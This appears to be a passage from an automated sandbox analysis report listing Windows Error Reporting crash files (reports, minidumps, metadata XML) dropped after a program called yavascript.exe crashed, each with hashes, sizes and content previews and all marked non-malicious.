                                                SHA-256:4A00C885B0641E14B2FB2F2084344E75B6BC2F1A124E5ADCBAA8E5C1D76D3D7C
                                                SHA-512:8C7C6A473EA45A82267833DAD2F903DF88EBEE81E6741DBE31557CE928DED6E1CDC5021A933A91FF83F43D5568A5D620CD6E4ED35825F2CB7E694315CE478CC4
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.6.8.6.1.4.0.6.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.e.a.9.3.8.6.-.5.5.1.c.-.4.f.9.8.-.b.3.6.7.-.8.6.f.8.6.3.f.b.4.c.7.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.6.8.5.9.b.4.-.5.2.6.c.-.4.e.9.6.-.a.2.d.a.-.b.a.9.0.c.f.7.a.0.c.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.e.8.-.0.0.0.1.-.0.0.1.5.-.4.0.c.3.-.7.1.7.3.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_5234ed1d7ecb99e2551a7c6515903d7434b037_ea442dc3_01c2a705-21c2-451f-a615-5ae6805d6bae\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8580526450272092
                                                Encrypted:false
                                                SSDEEP:96:U60XhJBus1h/H7if2QXIDcQuc6BcE/cw3u+HbHgoZee4nyNIPzOyRgo2ftZrcmEv:f8vBuH0gF1jjbHZrGzuiFrZ24IO8P8
                                                MD5:6403AA7A8B8A866C48ED514BC5154BCC
                                                SHA1:FC80555D938C58C219DCB8BDE451274EC2389076
                                                SHA-256:E480F2459C365D927468800E129B299DD2477DEDCF9216CEB13DE9E358D609CF
                                                SHA-512:6B859CE1659BB04C6D023B5779E5BE839FCDFA67C5813AD7F5A38A36F76946158269A01B1CF9E2DF3A3638B7B4D10FF4794A95302ED94DE558C3DFC544CB499E
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.7.0.1.9.4.5.5.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.4.5.9.7.1.0.2.2.6.8.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.c.2.a.7.0.5.-.2.1.c.2.-.4.5.1.f.-.a.6.1.5.-.5.a.e.6.8.0.5.d.6.b.a.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.b.2.9.6.e.4.-.4.7.8.f.-.4.9.b.7.-.9.e.4.e.-.e.b.e.5.a.5.b.0.6.a.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.6.4.-.0.0.0.1.-.0.0.1.5.-.a.2.6.1.-.7.7.7.4.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_yavascript.exe_9a5ba2c8fe28881fe54ec8233a3cde1e501b46_ea442dc3_2ee97c34-6f1f-426e-8948-3ed966e17be7\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9075338271961502
                                                Encrypted:false
                                                SSDEEP:192:PvMA0JsAnbcA/jR4Zr+UzuiFrZ24IO8a8:PvMbJsAnbcA/jqzuiFrY4IO8a
                                                MD5:71755F9F025F0EC846898849AFF1A09E
                                                SHA1:BAFD0B88FF0A1E371F6AB2633F024E00DCDBF3F4
                                                SHA-256:6E79FA19C1633ADB5A91D6ECC794F34D41CD9DCEB0F5FBC54E46BA30AF3F1AD9
                                                SHA-512:19B7D37FE5E359443F7400388A5DDF152DBD6B869BC110702778107B496DE044A33071A925323B57BD702973D38ED6480EB2F01F52943D0BDFABA3E8D4D25D29
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.4.5.9.7.3.0.7.4.1.0.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.e.9.7.c.3.4.-.6.f.1.f.-.4.2.6.e.-.8.9.4.8.-.3.e.d.9.6.6.e.1.7.b.e.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.7.c.a.b.3.8.-.2.1.e.2.-.4.c.d.a.-.b.4.b.3.-.0.3.3.3.8.9.0.6.d.2.d.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.y.a.v.a.s.c.r.i.p.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.e.8.-.0.0.0.1.-.0.0.1.5.-.4.0.c.3.-.7.1.7.3.e.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.c.1.e.b.a.f.9.5.8.1.3.4.e.6.7.4.a.7.a.7.b.d.1.6.3.6.2.9.2.4.0.0.0.0.f.f.f.f.!.0.0.0.0.f.6.b.f.5.1.b.2.b.c.c.c.9.1.4.7.6.1.3.6.e.4.3.a.9.1.b.1.7.0.7.6.e.d.7.8.b.0.8.3.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.y.a.v.a.s.c.r.i.p.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4E7.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:39 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):85856
                                                Entropy (8bit):2.3530009678156425
                                                Encrypted:false
                                                SSDEEP:768:scsqZdQH76nNdq2iytq6JoOHUO7wK2M9DDKv:sgzNLqNOHUO7wwXKv
                                                MD5:75A24893857D26B42163EC57F4AC6022
                                                SHA1:175DDE8A7D57467D800B83965868033B8CF2D1BF
                                                SHA-256:50424C8AA6A6F803202E38661F7E50EF41CDB851D6A69363737CF9545DFED83D
                                                SHA-512:867C5162BC7F8FACFBF91B97A4FCF7BA34F71C949B902DC3436BFAACAAF17A37849AC08F005DF902C287C49EA514FF1F2E350696931D1272E4E41D5DEDD59D1B
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g............T...........l...\.......$....9..........T.......8...........T...........@*.. %......................................................................................................eJ......L.......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6BD.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.6985113365025244
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpu262RG6Y2DOSU9T1C05gmfppdaWpBu89b8ROsfcq+Bm:R6lXJLR6B6YjSU9s05gmfpj18RNfc18
                                                MD5:D5589D6B8FC709671F692699B64B1CEA
                                                SHA1:79EB27696E9A2832DD2B47597082454D2C3C47B9
                                                SHA-256:474A4A401158AEB6404905FF28E22C4A9817676A590A6778FFE3E0773AEA979E
                                                SHA-512:7DDB9DF0F869029846E623DFAFCC8D4D0BB3BD954ED31EB8AD2ED37C96B231032A666AEA1F05BC10E446B839B97C6BB9E9E735206AA09D0DFF560643C711DCC4
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6FD.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.494996330281959
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYEYm8M4JqtF++q8v2Me7Bsd:uIjfxI70g7VIJFKu7Bsd
                                                MD5:5DCC0A984A4014FA4F5988609288AD25
                                                SHA1:0C7C043A974102D1BAF91CE8EE19450FA12C77B9
                                                SHA-256:CBA0954C09D95E9223E11AED322EE38F76C3E9F864549D902A20D7364560125C
                                                SHA-512:502D625E63CE78796A13D2FE0A93E3392980F614ADC9B3F90250CA0F8BABFF96CC3DCC3BEB15902BDB5515DF8BFE2487D21AD6B1D839273A06ED70841F64C2CF
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA97B.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:40 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):87508
                                                Entropy (8bit):2.388850286430915
                                                Encrypted:false
                                                SSDEEP:768:dHRZdQI+v7MR+kr5g2iytq6JoOHUO7wK2M9KadBnDp:d35+ogk5qNOHUO7wwLdNp
                                                MD5:5F2B22E9B56E6D2581A65F1897295413
                                                SHA1:A3F1F48AD19A7D1D77F8ABCAE6182D53CA65380B
                                                SHA-256:C4E045943CE27AAE322239919C1BD97C3EBDFA3C34D8503BAF5E500261837C7F
                                                SHA-512:EDFD7FCE0224D50CE7CE52D79B7B20B98E05119503616F77A6B4BAAE7700D51469C1C90DFE07F01ECAC809C525C61EE5C7D7D849027679BEAEEDA3401706DFBC
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g............T...........l...\.......t....9..........T.......8...........T...........@*...+......................................................................................................eJ......L.......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA96.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8412
                                                Entropy (8bit):3.6979018937666144
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpud62l6Y2DFSU9dogmfppdaWpBT89bkOsf0qsm:R6lXJLq6U6YISU9qgmfpjGkNfJ
                                                MD5:FEB7B2CDAA629E75A595D1A713D912C7
                                                SHA1:3B92BE7E7E3004E3A1673FE9E61A3D1332309858
                                                SHA-256:0F16DDCFA7D493815C0A5C59B3E379CD2EA0BF93B77DBDCE13A985E1E65D71E4
                                                SHA-512:62E2C961E8E80F7A7BAD86C1DE9506B478C11901CDCD5CA8CE21B8AC21630449CCC696C142B2A94B90186C14F39C6D4CB0FE4C16CB319D98EEA9FD76B2FE8544
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAC5.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.496064229115757
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYHYm8M4JqtFhjlo+q8v2Me7Bsd:uIjfxI70g7VfJEoKu7Bsd
                                                MD5:AE2D8C1BB3771B9BE8AA84F02037BF48
                                                SHA1:3E1FC9D254EE1C9DFE92962C8C39634E802F3DF1
                                                SHA-256:5235EB3A3A602A0977795BB92BC5E87950CE0356D13A38BEAB5F1EB8D5288575
                                                SHA-512:D6E2224D4BA2B203856CC38D20E1518C26EA6F66409374A1A7D8D683126B700E587A70C204C0EA27562430126F0CF45768B954A28B4EF296EEF98F75C1B67591
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE8C.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:41 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):93048
                                                Entropy (8bit):2.3560133241605388
                                                Encrypted:false
                                                SSDEEP:768:FqriJ27mENDUxfP2iytq6JoO0UO7wK2M9bjzZIqooi:wiQNDqeqNO0UO7wwFLoo
                                                MD5:BE4E2D92157321D976B5266B2AA7235D
                                                SHA1:78B5E9013AC5D8BB43B85CD83256571F09DC45D7
                                                SHA-256:2A6B2567255AF3C3F9A3BF18C468F329E2A0362B9B682FC58370C21F08613F36
                                                SHA-512:AB63C92E6FEDEF4472C99D68938BCCC8960F2B47BEF855CE343B6F98398D143AA5048BD545F13FCA15CC1EEB51186F74F1AB0CD06734A6BC564FFD5628611E21
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g........................................h=..........T.......8...........T...........0+..H@..........d...........P...............................................................................eJ..............GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF97.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8412
                                                Entropy (8bit):3.69806564573605
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpuR6f6Y2DoSU9q8MFgmfppdaWpB089bWOsf0tjSm:R6lXJLG6f6YlSU9ygmfpjzWNfEH
                                                MD5:ABBB95E83218FB850504503859BD063E
                                                SHA1:FEE61D2B539A5E98680C16F729497D0C2182D843
                                                SHA-256:1C27EDFB953F1FEFA2EA86DD12387341DEF329272308C6FCA1D3027B282B7EDE
                                                SHA-512:12FB3D7E3A716B3CE678C23F10D006799BF65721E48DF3F42059A98DAF6C33C212037B16322CC71CC4F3EFE7E2EC5844E455436C95A6B19FC079B591D86FA946
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFC7.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.4952586435216535
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYUYm8M4JqtFwX+q8v2Me7Bsd:uIjfxI70g7VcJxXKu7Bsd
                                                MD5:10F93B08AA6AB78F1AD2A35D4BB0C1AA
                                                SHA1:4EC51F95894C852B44FA9A6D00215EAC6CB2B525
                                                SHA-256:871001DDF28C0FEEBC949834603C4A636FD33C4239A593A5B259033CC5BAF5D7
                                                SHA-512:A2FE5F27890911422D2123D6328D5BE3EF6C78642367DEED152CFE48EB358D586C99168A327A07530989855AD067484E10BACCE907E7F484594817D7338253C2
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB207.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:42 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):99902
                                                Entropy (8bit):2.120601791832267
                                                Encrypted:false
                                                SSDEEP:384:Hs2IpnpYm7SmEoNETAslG7f4Uj7ExK2MnWZfq064YzSP+2pG2Y7b:Hs1pnp37fETAsQ7gu7wK2Mnw3YzSm0c
                                                MD5:6BF4BA4C2F1ADDBC3F210248018297BC
                                                SHA1:E33E6B841B484A7CF8DB07B456A095D292AC1EF1
                                                SHA-256:7EDF5DE831695D25C013758C0C90D7AFCE15D7149304CE7C9A242BAF6CB3EF01
                                                SHA-512:120EB11C8686022BD7F7260D450360F4CEFB6E2FE85DD1EDBF40E92A43F5A3AB2181C90795B470FCE798B253AC4A8EC86460C19D2484C21018D2BF829688273E
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g....................................t...`C..........T.......8...........T...........H,...Y......................................................................................................eJ......H.......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2B4.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8412
                                                Entropy (8bit):3.700627330406827
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpuJh686Y2DOSU9q8MFgmfppdaWpB989bWOsfUSm:R6lXJL0h686YjSU9ygmfpjYWNfg
                                                MD5:0EA7CFF8DD174CDAAA4DEFA4B49E066D
                                                SHA1:C5D1789C06DBDDC48BFFDEF13F9B4DBF017FECF7
                                                SHA-256:49152563C9FAB3B044AA017431D4EA8475C23254D2C84389EE0DB2411A1C1A5C
                                                SHA-512:34F6FD087AF1E050454E89F87A3AEE0319C48CB82D391048077ADAE3C6E168C2D0F5A5ACB14126F076151536AD2CB2AA539D6627B95DCAD2BCD192949791035A
                                                Malicious:false
